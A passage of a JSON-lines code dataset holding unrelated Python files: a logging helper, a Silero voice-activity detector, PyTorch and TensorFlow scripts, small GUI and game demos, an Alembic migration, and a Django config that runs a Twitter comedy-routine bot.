DEBUG(output.getvalue())\r\n output.close()\r\n\r\ndef _secondsSinceMidnight():\r\n today = datetime.date.today()\r\n seconds_since_midnight = time.time() - time.mktime(today.timetuple())\r\n return seconds_since_midnight\r\n\r\nclass ContextFilter(logging.Filter):\r\n \"\"\"\r\n This is a filter which injects seconds since midnight into the log.\r\n \"\"\"\r\n def filter(self, record):\r\n record.SECS = _secondsSinceMidnight()\r\n return True\r\n\r\ndef getLoggerClearLog():\r\n global LOG_FILENAME, my_logger, my_logger2\r\n\r\n #formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\r\n # Next formatter needs the ContextFilter to insert the SECS attribute\r\n #formatter = logging.Formatter('%(SECS)s - %(name)s - %(levelname)s - %(message)s')\r\n formatter = logging.Formatter('%(relativeCreated)d - %(name)s - %(levelname)s - %(message)s')\r\n\r\n handler = logging.handlers.RotatingFileHandler(\r\n LOG_FILENAME, maxBytes=50000, backupCount=5)\r\n handler.setFormatter(formatter)\r\n handler.doRollover() # Force a new log\r\n my_logger.addHandler(handler)\r\n\r\n # Create a separate my_logger2 that has a different formatter\r\n # Difference is that it indents the output by a TAB\r\n formatter2 = logging.Formatter('\\t%(relativeCreated)d - %(name)s - %(levelname)s - %(message)s')\r\n handler2 = logging.handlers.RotatingFileHandler(\r\n LOG_FILENAME, maxBytes=50000, backupCount=5)\r\n handler2.setFormatter(formatter2)\r\n my_logger2.addHandler(handler2)\r\n # Below filter needed if using SECS in formatter\r\n #my_logger.addFilter(ContextFilter())\r\n\r\n\r\ndef setLogLevel(iLevel):\r\n levels = {\r\n \"ERROR\": logging.ERROR,\r\n \"DEBUG\": logging.DEBUG,\r\n \"INFO\": logging.INFO,\r\n \"WARN\": logging.WARN\r\n }\r\n\r\n logLevel = levels[iLevel]\r\n my_logger.setLevel(logLevel)\r\n my_logger2.setLevel(logLevel)\r\n\r\ndef initLogger():\r\n global LOG_FILENAME, my_logger, my_logger2\r\n # Set up a specific logger with our desired output level\r\n my_logger = logging.getLogger('MyLogger')\r\n my_logger.setLevel(logging.DEBUG)\r\n my_logger2 = logging.getLogger('MyLogger2')\r\n my_logger2.setLevel(logging.DEBUG)\r\n #my_logger.setLevel(logging.INFO)\r\n #my_logger.setLevel(logging.WARN)\r\n #my_logger.setLevel(logging.ERROR)\r\n\r\n logsDir = os.path.dirname(LOG_FILENAME)\r\n if not os.path.exists(logsDir):\r\n os.makedirs(logsDir)\r\n\r\n getLoggerClearLog()\r\n\r\n\r\ninitLogger()\r\n\r\n","sub_path":"utils/logit.py","file_name":"logit.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"607314840","text":"import io\nimport numpy as np\nimport torch\ntorch.set_num_threads(1)\nimport torchaudio\nimport matplotlib\nimport matplotlib.pylab as plt\ntorchaudio.set_audio_backend(\"soundfile\")\nimport pyaudio\nimport time\n\nplt.rcParams[\"figure.figsize\"]=(12,3)\n\nmodel, utils = torch.hub.load(repo_or_dir='snakers4/silero-vad',\n model='silero_vad',\n force_reload=True)\n\n\n(get_speech_ts,\n get_speech_ts_adaptive,\n save_audio,\n read_audio,\n state_generator,\n single_audio_stream,\n collect_chunks) = utils\n\n# Taken from utils_vad.py\ndef validate(model,\n inputs: torch.Tensor):\n with torch.no_grad():\n outs = model(inputs)\n return outs\n\n# Provided by Alexander Veysov\ndef int2float(sound):\n abs_max = np.abs(sound).max()\n sound = sound.astype('float32')\n if abs_max > 0:\n sound *= 1/abs_max\n sound = sound.squeeze() # depends on the use case\n return 
sound\n\nFORMAT = pyaudio.paInt16\nCHANNELS = 1\nSAMPLE_RATE = 16000\nCHUNK = int(SAMPLE_RATE / 10)\n\naudio = pyaudio.PyAudio()\n\nframes_to_record = 20 # frames_to_record * frame_duration_ms = recording duration\nframe_duration_ms = 250\n\nstream = audio.open(format=FORMAT,\n channels=CHANNELS,\n rate=SAMPLE_RATE,\n input=True,\n frames_per_buffer=CHUNK)\ndata = []\nvoiced_confidences = []\ntest_confidences = []\n\n# from jupyterplot import ProgressPlot\nimport threading\n\ncontinue_recording = True\n\ndef stop():\n input(\"Press Enter to stop the recording:\")\n global continue_recording\n continue_recording = False\n\ndef start_recording():\n stream = audio.open(format=FORMAT,\n channels=CHANNELS,\n rate=SAMPLE_RATE,\n input=True,\n frames_per_buffer=CHUNK)\n startTime=time.time()\n data = []\n voiced_confidences = []\n test_confidences = []\n\n global continue_recording\n continue_recording = True\n\n # pp = ProgressPlot(plot_names=[\"Silero VAD\"], line_names=[\"speech probabilities\"], x_label=\"audio chunks\")\n\n\n stop_listener = threading.Thread(target=stop)\n stop_listener.start()\n\n isAgain = False\n temp_confidence = []\n speechCount = 0\n checkTime = 0\n while continue_recording:\n audio_chunk = stream.read(int(SAMPLE_RATE * frame_duration_ms / 1000.0))\n\n # in case you want to save the audio later\n data.append(audio_chunk)\n\n audio_int16 = np.frombuffer(audio_chunk, np.int16);\n\n audio_float32 = int2float(audio_int16)\n\n # get the confidences and add them to the list to plot them later\n vad_outs = validate(model, torch.from_numpy(audio_float32))\n\n # get the confidence value so that jupyterplot can process it\n new_confidence = vad_outs[:, 1].numpy()[0].item()\n # new_confidence = vad_outs[:, 1]\n\n #잘 되는 코드 하나 근데 쪼금 불안정\n # if new_confidence>0.7 and isAgain is False : #처음 시작 타임체크\n # checkTime = time.time()\n # isAgain = True\n # elif new_confidence>0.7 and isAgain is True and Toggle is False: #다음 일때, 연속 체크\n # nowTime = time.time()\n # temp_confidence.append(new_confidence)\n # temp_avg = sum(temp_confidence)/len(temp_confidence)\n # if nowTime - checkTime > 7 and temp_avg>0.5: #7초가 지났을 때\n # speechCount+=1\n # isAgain=False\n # Toggle=True\n # print(\"발표!\", nowTime-startTime)\n # temp_confidence.clear()\n # if new_confidence<=0.7:\n # Toggle=False\n\n if new_confidence>0.7 and isAgain is False:\n isAgain = True\n checkTime = time.time()\n\n if isAgain is True:\n temp_confidence.append(new_confidence)\n nowTime=time.time()\n if nowTime - checkTime > 6: #6초의 타임스팬에서\n temp_avg = sum(temp_confidence)/len(temp_confidence)\n temp_spoken = sum(map(lambda x: x > 0.6, temp_confidence))\n temp_spoken_ratio = temp_spoken/len(temp_confidence)\n if temp_spoken_ratio>0.4: #말을 한 비율이 40%정도면 발표로 인식\n speechCount+=1\n balpyo_time = nowTime-startTime\n print(\"발표! 
{}분 {}초\".format(int(balpyo_time/60), int(balpyo_time%60)))\n temp_confidence.clear()\n isAgain=False\n\n\n if len(voiced_confidences)>50 :\n del voiced_confidences[0]\n voiced_confidences.append(new_confidence)\n test_confidences.append(new_confidence)\n\n # print(type(voiced_confidences))\n\n # pp.update(new_confidence)\n plt.clf()\n plt.ylim([0,1])\n plt.xticks([])\n plt.axhline(y=0.7)\n plt.plot(voiced_confidences)\n plt.pause(0.00001)\n\n print(\"\\n\\n총 발표 횟수 : \",speechCount)\n # pp.finalize()\n # plt.plot(new_confidence)\n # plt.figure(figsize=(12, 6))\n endTime = time.time()\n timeSpan = endTime-startTime\n # print(timeSpan)\n # print(voiced_confidences)\n count = sum(map(lambda x: x > 0.7, test_confidences))\n length = len(test_confidences)\n\n print(\"발화 비율 : \", (count/length)*100, \"%\")\n plt.savefig('vad_result.png', bbox_inches='tight')\n # plt.show()\n\n\n# print(type(voiced_confidences))\nstart_recording()\n# count = sum(map(lambda x : x<0.2, voiced_confidences))\n# print(\"total length\", len(voiced_confidences))\n# print('Count of odd numbers in a list : ', count)","sub_path":"VoiceActivityDetection.py","file_name":"VoiceActivityDetection.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"191050054","text":"#!/usr/env/python3\n\n\ndef main():\n after_g()\n\n\n# Print words that begin after letter \"G\"/\"g\" in upper case\ndef after_g():\n ret = \"\"\n flag = False\n s = input(\"enter a 1 sentence quote, non-alpha separate words:\")\n for word in s.split(\" \"):\n if word[0].lower() > 'g':\n flag = True\n for l in word:\n if l.isalpha():\n ret += l.upper()\n if flag:\n print(ret)\n ret = \"\"\n flag = False\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Module_1_II.py","file_name":"Module_1_II.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"175582448","text":"\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport collections\r\nimport json\r\nimport math\r\nimport os\r\nimport random\r\n#import modeling\r\n#import optimization\r\n#import tokenization\r\nimport six\r\n#import tensorflow as tf\r\nimport argparse\r\nimport re\r\nimport sys\r\n\r\nimport logging\r\nimport math\r\nimport os\r\n\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.nn import CrossEntropyLoss, MSELoss\r\nimport torch.nn.functional as F\r\nimport torch.distributed as dist\r\n\r\nfrom torch.utils.data import Dataset\r\nfrom torch.utils.data import DataLoader\r\n\r\n# long term memory should be cross gpus.\r\n# \r\n#class Memory:\r\n# def __init__(self, dim, device):\r\n# self.mem = torch.rand([dim], dtype=torch.float, device = device)\r\n\r\n#class NpBufferModule(nn.Module):\r\n# def __init__(self):\r\n# super().__init()\r\n# self._persistent_buffers_set = set() \r\n# def register_persistent(self, name, persistent=True)\r\n# if persistent:\r\n# self._persistent_buffers_set.add(name)\r\n# else:\r\n# self._persistent_buffers_set.discard(name)\r\n\r\nclass DNN(nn.Module):\r\n \"\"\"Construct the embeddings from word, position and token_type embeddings.\r\n \"\"\"\r\n def __init__(self, input_dim, hidden_dim, output_dim): #, cache_mem):\r\n super().__init__()\r\n\r\n self.output_dim = output_dim\r\n self.input_dim = input_dim\r\n\r\n self.proj1 = nn.Linear(input_dim, hidden_dim, bias=False)\r\n self.proj2 = 
nn.Linear(hidden_dim, output_dim, bias=False)\r\n\r\n self.register_buffer('param', torch.zeros([output_dim], dtype=torch.float)) #, persistent=False)\r\n\r\n self.register_buffer('mem', torch.rand([output_dim], dtype=torch.float)) #, persistent=False)\r\n #self.param = None # torch.rand([output_dim], dtype=torch.float)\r\n #self.cache_mem = cache_mem\r\n #self.param = None # torch.zeros([self.output_dim], device = device, dtype=torch.float)\r\n \r\n def init_param(self, device): # d_idx, device):\r\n #self.cache_mem[d_idx] = torch.zeros([self.output_dim], device = device, dtype=torch.float)\r\n self.param = torch.zeros([self.output_dim], device = device, dtype=torch.float)\r\n print('initial cache parameters.')\r\n \r\n def gather_x(self, x):\r\n #with torch.no_grad():\r\n gathered_x = [torch.ones_like(x) for _ in range(torch.distributed.get_world_size())]\r\n torch.distributed.all_gather(gathered_x, x, async_op=False)\r\n gathered_x = torch.cat(gathered_x, dim=0)\r\n return gathered_x\r\n \r\n\r\n def forward(self, x):\r\n print(x.device)\r\n \r\n #d_idx = int(str(x.device).split(':')[1])\r\n #if not d_idx in self.cache_mem : # [d_idx] == None:\r\n # self.init_param(d_idx, x.device)\r\n #if self.param == None:\r\n # self.init_param(x.device)\r\n\r\n h1 = self.proj1(x)\r\n #h1 = F.tanh(h1)\r\n h2 = self.proj2(h1)\r\n\r\n #g_h2 = self.gather_x(h2)\r\n\r\n\r\n # h2 = h2 + self.param.detach() # [d_idx].detach()\r\n\r\n\r\n # t = h2.sum(dim=0)\r\n \r\n # with torch.no_grad():\r\n # self.param.copy_(t.detach())\r\n\r\n # h2_full = self.gather_x(h2)\r\n # mem_score = torch.matmul(h2_full, self.mem)\r\n # print('mem_score', mem_score)\r\n\r\n # gathered_score = [torch.ones_like(x) for _ in range(torch.distributed.get_world_size())]\r\n \r\n # torch.distributed.gather(mem_score[0:2], )\r\n\r\n return h2\r\n\r\n def zero_init(self):\r\n with torch.no_grad():\r\n #h2.weight.data.normal_(mean=0.0, std=0.02)\r\n self.proj2.weight.data.zero_()\r\n self.proj2.bias.data.zero_()\r\n #self.proj2.weight.data\r\n\r\n def layer1(self, x):\r\n h1 = self.proj1(x)\r\n h1 = F.tanh(h1)\r\n return h1\r\n\r\n#gpu_id = '2,3'\r\n#device_num = len(gpu_id.split(','))\r\n#print(\"set gpu number \", device_num, gpu_id)\r\n\r\n#os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu_id)\r\n#device_ids = [t for t in range(0, device_num)]\r\n\r\ntorch.manual_seed(911)\r\n#device = torch.device(\"cuda:0\")\r\n\r\n# python -m torch.distributed.launch --nproc_per_node=4 python/open_reasoNet/test_multigpu.py\r\n\r\n\r\nclass RandomDataset(Dataset):\r\n def __init__(self, local_rank, device):\r\n self.len = 11\r\n self.data = torch.stack([torch.ones(5), torch.ones(5)*2,\r\n torch.ones(5)*3,torch.ones(5)*4,\r\n torch.ones(5)*5,torch.ones(5)*6,\r\n torch.ones(5)*7,torch.ones(5)*8,\r\n torch.ones(5)*9, torch.ones(5)*10,\r\n torch.ones(5)*11]).to(device)\r\n self.local_rank = local_rank\r\n def __getitem__(self, index):\r\n return self.data[index]\r\n\r\n def __len__(self):\r\n return self.len\r\n\r\ndef main():\r\n # local cache. 
(no merge).\r\n #cache_mem = {}\r\n #for d in range(device_num):\r\n # cache_mem.append(None)\r\n\r\n # global cache,\r\n \r\n #rank = args.nr * args.gpus + gpu \r\n dist.init_process_group(backend='nccl')\r\n local_rank = torch.distributed.get_rank()\r\n torch.cuda.set_device(local_rank)\r\n device = torch.device(\"cuda\", local_rank) \r\n\r\n net = DNN(5, 3, 2) #, cache_mem)\r\n #if device_num > 1:\r\n # torch.distributed.init_process_group(backend=\"nccl\")\r\n # device = torch.device(\"cuda\", self.local_rank)\r\n\r\n #net = nn.DataParallel(net, device_ids=device_ids)\r\n\r\n net.to(device)\r\n print('model in gpu')\r\n \r\n net = torch.nn.parallel.DistributedDataParallel(net, device_ids=[local_rank], output_device=local_rank, broadcast_buffers=False)\r\n \r\n\r\n dataset = RandomDataset(local_rank, device)\r\n sampler = torch.utils.data.distributed.DistributedSampler(dataset)\r\n\r\n rand_loader = DataLoader(dataset=dataset, batch_size=2, sampler=sampler)\r\n #e = 0\r\n #while e < 2:\r\n # sampler.set_epoch(e)\r\n # for data in rand_loader:\r\n # print(data)\r\n # e+=1\r\n #return\r\n\r\n batch = 2\r\n inx = torch.rand([batch, 5], dtype=torch.float, device=device)\r\n\r\n for b in range(batch):\r\n inx[b] = inx[b] * local_rank \r\n\r\n net.train()\r\n \r\n net.init_param()\r\n\r\n for i in range(10):\r\n outy = net(inx)\r\n #print(outy.shape)\r\n print(outy)\r\n\r\n #net.module.zero_init()\r\n #outz = net(inx)\r\n\r\n #print(outz.shape)\r\n #print(outz)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"python/open_reasoNet/test_multigpu.py","file_name":"test_multigpu.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"133781913","text":"import cv2,time,os,re\nimport tensorflow as tf\nimport numpy as np\nimport utils\nimport model\nFLAGS = utils.FLAGS\n\npre_data_dir = '/home/sjhbxs/Data/data_coco_task2/ICDAR_TASK2_new2'\n#data_dir = pre_data_dir + '/test_data/val_words'\ndata_dir = pre_data_dir + '/test_data/val_words'\nsave_dir = '../log/text_save/analysis_predict.txt'\n\ndef predict_func_tem():\n if True: \n test_feeder=utils.DataIterator3(data_dir=data_dir)\n print(test_feeder.image_num) \n for cur_batch in range(int(test_feeder.size / FLAGS.batch_size) + 1):\n indexs=[]\n cur_batch_num = FLAGS.batch_size\n if cur_batch == int(test_feeder.size / FLAGS.batch_size):\n cur_batch_num = test_feeder.size - cur_batch * FLAGS.batch_size \n for i in range(cur_batch_num):\n indexs.append(cur_batch * FLAGS.batch_size + i) \n \ndef predict_func():\n g = model.Graph()\n with tf.Session(graph = g.graph) as sess:\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver(tf.global_variables(),max_to_keep=100)\n ckpt = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\n if ckpt:\n saver.restore(sess,ckpt)\n print('restore from ckpt{}'.format(ckpt))\n else:\n print('cannot restore') \n test_feeder=utils.DataIterator3(data_dir=data_dir)\n f=open(save_dir,mode=\"a\")\n print(\"total data:\",test_feeder.size)\n print(\"total image in folder\", test_feeder.total_pic_read)\n total_epoch = int(test_feeder.size / FLAGS.batch_size) + 1\n for cur_batch in range(total_epoch):\n print(\"cur_epoch/total_epoch\",cur_batch,\"/\",total_epoch)\n indexs=[]\n cur_batch_num = FLAGS.batch_size\n if cur_batch == int(test_feeder.size / FLAGS.batch_size):\n cur_batch_num = test_feeder.size - cur_batch * FLAGS.batch_size \n for i in range(cur_batch_num):\n indexs.append(cur_batch * FLAGS.batch_size + 
i) \n test_inputs, num_batch=test_feeder.input_index_generate_batch(indexs)\n test_feed={g.inputs: test_inputs,\n g.seq_len: np.array([g.cnn_time]*test_inputs.shape[0]),\n g.keep_prob_fc: 1,\n g.keep_prob_cv1: 1,\n g.keep_prob_cv2: 1,\n g.keep_prob_cv3: 1,\n g.keep_prob_cv4: 1}\n dense_decoded, logits_before_ctc= sess.run([g.dense_decoded,g.logits_before_ctc],test_feed)\n for encode_list,dense_list, e_num in zip(logits_before_ctc, dense_decoded, num_batch):\n decode_string = utils.decode_function1(encode_list)\n decode_string1 = utils.decode_function1(dense_list)\n f.write(e_num + \",\" + decode_string + \",\" + decode_string1 + \",\" + str(encode_list) + \"\\n\")\n f.close()\n print(\"saved prediction\")\n \n\nif __name__ == '__main__':\n predict_func()\n","sub_path":"ICDAR_TASK2_new11/code_py/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"428321604","text":"#!/usr/bin/env python\n\nimport wx\n\nclass TestFrame(wx.Frame):\n def __init__(self, parent, title):\n wx.Frame.__init__(self, parent, wx.ID_ANY, title=title)\n text = wx.StaticText(self, label=\"Hallo Welt!\")\n\napp = wx.App(redirect=False)\nframe = TestFrame(None, \"Ein kleines Beispiel\")\nframe.Show()\napp.MainLoop()\n","sub_path":"python/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"191498296","text":"from computerclass import Computer\n\ndef main():\n num = input(\"\\nElija un numero: \")\n juego = Computer()\n intento = 0\n while juego.is_playing == True:\n intento = intento + 1\n print(\"Recuerde que su numero es: \",num)\n juego.play()\n print(f\"Termino en {intento} intentos\")\nmain()\n","sub_path":"Practicas/prueba2/listo/juego.py","file_name":"juego.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"127688778","text":"\"\"\"empty message\n\nRevision ID: 2970b6fdf939\nRevises: 384c7334912b\nCreate Date: 2018-10-24 12:11:33.339262\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '2970b6fdf939'\ndown_revision = '384c7334912b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('user_flag',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('flag', sa.String(length=127), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('user_flag_event',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_flag_id', sa.Integer(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('thrower_id', sa.Integer(), nullable=True),\n sa.Column('time_thrown', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['thrower_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['user_flag_id'], ['user_flag.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_user_flag_event_thrower_id'), 'user_flag_event', ['thrower_id'], unique=False)\n op.create_index(op.f('ix_user_flag_event_user_flag_id'), 'user_flag_event', ['user_flag_id'], unique=False)\n op.create_index(op.f('ix_user_flag_event_user_id'), 'user_flag_event', ['user_id'], unique=False)\n op.drop_index('ix_user_displayname', table_name='user')\n op.create_index(op.f('ix_user_displayname'), 'user', ['displayname'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_user_displayname'), table_name='user')\n op.create_index('ix_user_displayname', 'user', ['displayname'], unique=True)\n op.drop_index(op.f('ix_user_flag_event_user_id'), table_name='user_flag_event')\n op.drop_index(op.f('ix_user_flag_event_user_flag_id'), table_name='user_flag_event')\n op.drop_index(op.f('ix_user_flag_event_thrower_id'), table_name='user_flag_event')\n op.drop_table('user_flag_event')\n op.drop_table('user_flag')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/2970b6fdf939_.py","file_name":"2970b6fdf939_.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"447387971","text":"def main():\r\n ## Display the names of the first three presidents.\r\n file = \"FirstPresidents.txt\"\r\n displayWithForLoop(file)\r\n print()\r\n displayWithListComprehension(file)\r\n \r\ndef displayWithForLoop(file):\r\n infile = open(file, 'r')\r\n for line in infile:\r\n print(line, end=\"\")\r\n infile.close()\r\n \r\ndef displayWithListComprehension(file):\r\n infile = open(file, 'r')\r\n listPres = [line[:-1] for line in infile]\r\n infile.close()\r\n print(listPres)\r\n \r\nmain() \r\n\r\n","sub_path":"EX/CH5/5-1-1.py","file_name":"5-1-1.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"53029274","text":"#!/usr/bin/env python3\n\nimport pyglet\nfrom pyglet.media.procedural import Sine\nfrom pyglet.window import key\nfrom src.config import CTRL_CMD\n\nclass Sound (Sine):\n def replay(self):\n self.seek(0)\n return self.play()\n\nBLACK=(0, 0, 0, 255)\nWHITE=(255, 255, 255, 255)\nBCKND=(0, .5, .8, 1)\n\nwindow = pyglet.window.Window(640, 480)\n\npyglet.gl.glClearColor(*BCKND)\n\nchecker_pattern = pyglet.image.CheckerImagePattern(color1=BLACK, color2=WHITE)\nimage = pyglet.image.create(64,64, checker_pattern)\nimage.anchor_x = 32\nimage.anchor_y = 32\nsprite = pyglet.sprite.Sprite(img=image, x=320, y=240)\n\nsound = Sine(0.1, 830)\nsound.__class__ = Sound\n\n@window.event\ndef on_key_press(symbol, mods):\n #Manage exit\n if mods & CTRL_CMD and (symbol == key.Q or symbol == key.W):\n 
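# Ctrl/Cmd+Q or Ctrl/Cmd+W quits the application\n 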
pyglet.app.exit()\n elif symbol == key.ESCAPE:\n return pyglet.event.EVENT_HANDLED\n \n elif symbol == key.A:\n sprite.x -= 5\n sound.replay()\n elif symbol == key.W:\n sprite.y += 5\n sound.replay()\n elif symbol == key.D:\n sprite.x += 5\n sound.replay()\n elif symbol == key.S:\n sprite.y -= 5\n sound.replay()\n\n@window.event\ndef on_draw():\n window.clear()\n sprite.draw()\n\ndef update(dt):\n sprite.rotation += dt * 45\n \npyglet.clock.schedule_interval(update, 1 / 60.0)\n\npyglet.app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"166721259","text":"\"\"\"\nWSGI config for config project.\n\nIt exposes the WSGI callable as a module-level variable named ``application``.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/\n\"\"\"\n\nimport os\nimport time\nimport datetime\nimport random\nimport schedule\nimport threading\nimport requests\n\nfrom django.core.wsgi import get_wsgi_application\nfrom milkboy.views import GENRES\nfrom milkboy.coreAI import generate_neta_list\nfrom twitter import Twitter, TwitterStream, OAuth\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.prod')\n\napplication = get_wsgi_application()\n\n\ndef get_auth():\n try:\n from config.settings import dev\n auth = OAuth(\n dev.TW_TOKEN,\n dev.TW_TOKEN_SECRET,\n dev.TW_CONSUMER_KEY,\n dev.TW_CONSUMER_SECRET\n )\n print('this is from dev')\n except:\n from config.settings import prod\n auth = OAuth(\n prod.TW_TOKEN,\n prod.TW_TOKEN_SECRET,\n prod.TW_CONSUMER_KEY,\n prod.TW_CONSUMER_SECRET\n )\n print('this is from prod')\n return auth\n\n\ndef tweet():\n res = 'fail'\n print(res)\n while res != 'success':\n time.sleep(10)\n start_t = time.time()\n stage_max = 3\n genre_name = random.choice(GENRES + ['random']*3)\n print(genre_name)\n theme = pred1 = pred2 = ''\n first_stage = {}\n neta_list = []\n stage_num = 3\n while True:\n try:\n seed = random.randint(0, 100000)\n if genre_name == 'random':\n neta_list = generate_neta_list('random', seed, stage_max)\n else:\n neta_list = generate_neta_list('', seed, stage_max, genre_name)\n stage_num = len(neta_list)\n if time.time() - start_t > 30:\n continue\n except:\n continue\n first_stage = neta_list[0] if stage_num > 1 else neta_list[-1]\n theme = first_stage['theme']\n pred1, pred2 = first_stage['pred1'], first_stage['pred2']\n if pred1 != '' and pred2 != '':\n break\n # つかみ\n text1, text2 = tsukami_script(theme, first_stage['tsukami'])\n first_tweet = update_status(text1)\n data = update_status(text2, first_tweet['id'])\n # 導入\n texts = introduction(first_stage['category'], pred1, pred2)\n data = multiple_tweets(texts, data)\n for i in range(stage_num):\n neta = neta_list[i] if i < stage_num - 1 else neta_list[-1]\n feat_text = [f\"駒場「{neta['featX']}」\\n\\n\", f\"内海「{neta['featX_reply']}」\\n\\n\",\n f\"駒場「{neta['anti_featX']}」\\n\\n\", f\"内海「{neta['anti_featX_reply']}」\\n\\n\"]\n if i != stage_num - 2:\n feat_text.append(f\"駒場「{neta['conjunction']}」\\n\\n\")\n if i == stage_num - 1:\n feat_text.append(\"内海「いや、絶対ちゃうやろ。」\\n\\n\")\n feat_text.append(\"内海「もうええわ、どうもありがとうございました。」\\n\\n\")\n data = multiple_tweets(feat_text, data)\n print('last of tweet func')\n res = 'success'\n print(res)\n return\n\n\ndef auto_reply():\n twitter_stream = TwitterStream(auth=get_auth())\n theme = pred1 = pred2 = ''\n first_stage = {}\n neta_list = []\n stage_num = 3\n 
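# stream mentions that include the keyword 'テーマ' and reply with a generated routine\r\n 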
print('activate auto reply')\r\n for tweet in twitter_stream.statuses.filter(language='ja', track='@milkboy_core_ai テーマ'):\r\n start_t = time.time()\r\n stage_max = 3\r\n print(tweet)\r\n try:\r\n theme = tweet['text'].split()[-1]\r\n if '@' in theme or len(theme) > 30:\r\n continue\r\n tle = False\r\n while True:\r\n try:\r\n seed = random.randint(0, 100000)\r\n neta_list = generate_neta_list(theme, seed, stage_max)\r\n stage_num = len(neta_list)\r\n if time.time() - start_t > 30:\r\n tle = True\r\n break\r\n except:\r\n continue\r\n first_stage = neta_list[0] if stage_num > 1 else neta_list[-1]\r\n pred1, pred2 = first_stage['pred1'], first_stage['pred2']\r\n print(pred1)\r\n if pred1 != '' and pred2 != '':\r\n break\r\n if tle:\r\n continue\r\n # opening (tsukami)\r\n text1, text2 = tsukami_script(theme, first_stage['tsukami'])\r\n first_tweet = update_status(text1)\r\n data = update_status(text2, first_tweet['id'])\r\n # introduction\r\n texts = introduction(first_stage['category'], pred1, pred2)\r\n data = multiple_tweets(texts, data)\r\n for i in range(stage_num):\r\n neta = neta_list[i] if i < stage_num - 1 else neta_list[-1]\r\n feat_text = [f\"駒場「{neta['featX']}」\\n\\n\", f\"内海「{neta['featX_reply']}」\\n\\n\",\r\n f\"駒場「{neta['anti_featX']}」\\n\\n\", f\"内海「{neta['anti_featX_reply']}」\\n\\n\"]\r\n if i != stage_num - 2:\r\n feat_text.append(f\"駒場「{neta['conjunction']}」\\n\\n\")\r\n if i == stage_num - 1:\r\n feat_text.append(\"内海「いや、絶対ちゃうやろ。」\\n\\n\")\r\n feat_text.append(\"内海「もうええわ、どうもありがとうございました。」\\n\\n\")\r\n data = multiple_tweets(feat_text, data)\r\n reply_text = f\"@{tweet['user']['screen_name']}\\nネタを投稿しました!\\n\"\r\n reply_text += f\"https://twitter.com/milkboy_core_ai/status/{first_tweet['id']}\"\r\n update_status(reply_text, tweet['id_str'])\r\n except:\r\n continue\r\n\r\n\r\ndef multiple_tweets(texts, data):\r\n text = ''\r\n for tweet_text in texts:\r\n if len(text + tweet_text) <= 130:\r\n text += tweet_text\r\n elif len(text) == 0:\r\n data = update_status(tweet_text, data['id'])\r\n else:\r\n data = update_status(text, data['id'])\r\n text = tweet_text\r\n data = update_status(text, data['id'])\r\n return data\r\n\r\n\r\ndef update_status(tweet_text, reply_id=None):\r\n max_len = 130\r\n texts = []\r\n if len(tweet_text) > max_len:\r\n left = 0\r\n right = max_len\r\n texts.append(tweet_text[left:right])\r\n while right < len(tweet_text):\r\n left += max_len\r\n right += max_len\r\n texts.append(tweet_text[left:right])\r\n else:\r\n texts.append(tweet_text)\r\n if reply_id is None:\r\n data = API.statuses.update(status=texts[0])\r\n else:\r\n data = API.statuses.update(status=texts[0], in_reply_to_status_id=reply_id)\r\n for text in texts[1:]:\r\n data = API.statuses.update(status=text, in_reply_to_status_id=data['id'])\r\n return data\r\n\r\n\r\ndef tsukami_script(word, tsukami):\r\n dt_now = datetime.datetime.now()\r\n text = dt_now.strftime('%m月%d日 %H:%M:%S') + \"\\n\\n\"\r\n text += f\"テーマ: {word}\\n\\n\"\r\n text += 